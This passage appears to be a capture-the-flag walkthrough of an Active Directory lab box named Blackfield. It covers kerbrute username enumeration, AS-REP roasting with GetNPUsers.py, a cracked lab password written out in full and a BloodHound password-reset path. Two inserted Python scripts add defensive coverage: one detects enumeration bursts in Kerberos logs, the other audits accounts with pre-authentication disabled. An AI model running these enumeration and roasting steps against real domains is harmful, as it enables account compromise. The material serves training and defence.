Kerberos - 88

So we have a list of usernames from the share we found, plus another list from SID brute-forcing. I used kerbrute to find which of them are valid domain usernames.

kerbrute userenum -d blackfield.local --dc 10.10.10.192 usernames

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/11/25 - Ronnie Flathers @ropnop

2025/02/11 23:36:58 >  Using KDC(s):
2025/02/11 23:36:58 >   10.10.10.192:88

2025/02/11 23:37:19 >  [+] VALID USERNAME:       [email protected]
2025/02/11 23:39:21 >  [+] VALID USERNAME:       [email protected]
2025/02/11 23:39:21 >  [+] VALID USERNAME:       [email protected]
2025/02/11 23:39:48 >  Done! Tested 317 usernames (3 valid) in 170.431 seconds
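From the defender's side, this enumeration is noisy: each invalid name the tool tries makes the domain controller log a failed Kerberos AS-REQ (event 4768) with result code 0x6, KDC_ERR_C_PRINCIPAL_UNKNOWN, while a valid name that needs pre-authentication gets 0x19 instead. The script below is an added example, not part of this writeup or of kerbrute: it runs over a few constructed log lines in a simplified field=value layout (an assumption, not real Windows event text) and flags any client that produced many distinct unknown-principal failures inside a short sliding window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log in a simplified "field=value" layout (assumption, not
# real Windows event formatting). Event 4768 = Kerberos authentication ticket
# (TGT) request; Result=0x6 means the principal does not exist, Result=0x19
# means the user exists and pre-authentication is required.
SAMPLE_LOG = """\
2025-02-11T23:36:58 EventID=4768 Client=10.10.14.5 Account=aaron Result=0x6
2025-02-11T23:36:59 EventID=4768 Client=10.10.14.5 Account=abby Result=0x6
2025-02-11T23:37:00 EventID=4768 Client=10.10.14.5 Account=adam Result=0x6
2025-02-11T23:37:01 EventID=4768 Client=10.10.14.5 Account=jdoe Result=0x19
2025-02-11T23:37:02 EventID=4768 Client=10.10.14.5 Account=alice Result=0x6
2025-02-11T23:37:03 EventID=4768 Client=10.10.14.5 Account=alan Result=0x6
2025-02-11T23:37:04 EventID=4768 Client=10.10.14.5 Account=amy Result=0x6
2025-02-11T23:40:00 EventID=4768 Client=10.10.14.9 Account=jsmith Result=0x6
2025-02-11T23:45:00 EventID=4768 Client=10.10.14.9 Account=jsmith Result=0x6
2025-02-11T23:46:00 EventID=4768 Client=10.10.14.9 Account=j.smith Result=0x6
"""

LINE_RE = re.compile(
    r"^(\S+) EventID=(\d+) Client=(\S+) Account=(\S+) Result=(\S+)$"
)

KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"


def parse_line(line):
    """Parse one constructed log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, event_id, client, account, result = m.groups()
    return {
        "ts": datetime.fromisoformat(ts),
        "event_id": event_id,
        "client": client,
        "account": account.lower(),
        "result": result.lower(),
    }


def detect_enumeration(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: max_distinct_unknown_names} for every client that asked
    for at least `threshold` different non-existent principals within `window`.

    A user mistyping a name produces one or two 0x6 failures spread over time;
    a wordlist-driven enumeration produces a burst of distinct names, which is
    what the sliding window catches.
    """
    failures = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["event_id"] == "4768" and ev["result"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            failures[ev["client"]].append((ev["ts"], ev["account"]))

    flagged = {}
    for client, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {name for _, name in events[start:end + 1]}
            if len(distinct) >= threshold:
                flagged[client] = max(flagged.get(client, 0), len(distinct))
    return flagged


if __name__ == "__main__":
    for client, count in detect_enumeration(SAMPLE_LOG).items():
        print(f"possible username enumeration from {client}: {count} unknown principals")
```

With the constructed sample, 10.10.14.5 tries six different non-existent names in a few seconds and is flagged, while 10.10.14.9 only repeats one mistyped name and is not. Counting distinct names rather than raw failures keeps a single locked-out user from tripping the rule.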

After that I used GetNPUsers.py to find users that do not require Kerberos pre-authentication.

GetNPUsers.py blackfield.local/ -no-pass -dc-ip 10.10.10.192 -usersfile sid_users

It returned a hash.

Cracking it with hashcat gives our first pair of credentials: [email protected]:#00^BlackKnight
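What GetNPUsers.py keys on is a single bit in each account's userAccountControl attribute: UF_DONT_REQUIRE_PREAUTH (0x400000). An account with that bit set hands out an AS-REP that can be cracked offline exactly as shown above, so the fix on the defensive side is to find those accounts and clear the bit. The snippet below is an added example, not part of this writeup or of impacket; the directory records are constructed and the record shape is an assumption, but the flag values and the LDAP bitwise-AND matching rule OID are the standard Active Directory ones.

```python
# Standard userAccountControl flag values (Active Directory).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQUIRE_PREAUTH = 0x400000

# LDAP_MATCHING_RULE_BIT_AND; lets a filter test a single bit of an integer attribute.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# Constructed directory records (assumption about shape; a real audit would pull
# sAMAccountName and userAccountControl over LDAP).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "jdoe",       "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "svc_legacy", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "old_svc",    "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "backup_op",  "userAccountControl": UF_NORMAL_ACCOUNT},
]


def preauth_disabled(uac):
    """True if the account will answer an AS-REQ without pre-authentication."""
    return bool(uac & UF_DONT_REQUIRE_PREAUTH)


def is_enabled(uac):
    return not (uac & UF_ACCOUNTDISABLE)


def find_asrep_roastable(accounts):
    """Names of enabled accounts with pre-auth disabled, i.e. the ones an
    AS-REP roasting tool would get a crackable hash for. Disabled accounts are
    skipped because the KDC refuses them a ticket regardless of the flag."""
    return sorted(
        a["sAMAccountName"]
        for a in accounts
        if is_enabled(a["userAccountControl"]) and preauth_disabled(a["userAccountControl"])
    )


def audit_filter():
    """LDAP filter that returns every user object with the bit set; handy for
    querying the directory directly instead of exporting records."""
    return (
        f"(&(objectCategory=person)(objectClass=user)"
        f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={UF_DONT_REQUIRE_PREAUTH}))"
    )


def remediated_uac(uac):
    """The userAccountControl value to write back: same flags, pre-auth required."""
    return uac & ~UF_DONT_REQUIRE_PREAUTH


if __name__ == "__main__":
    print("LDAP filter:", audit_filter())
    for name in find_asrep_roastable(SAMPLE_ACCOUNTS):
        print(f"{name}: pre-auth disabled, should be set back to {remediated_uac(UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH):#x}")
```

Only svc_legacy comes back in the constructed data: old_svc has the same flag but is disabled, so it is not exposed until someone re-enables it, which is worth a comment in the audit report rather than silence. Where the bit is genuinely needed for some legacy client, the usual compensating control is a long random password on that account so the offline crack does not succeed.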

These credentials only work over SMB, and we can list the shares but not read all of them.

Still no access to the shares. We know there are other users, so I ran BloodHound to graph the domain.

Bloodhound

We can change the password of the user audit2020. BloodHound also shows how this can be abused from both Linux and Windows.
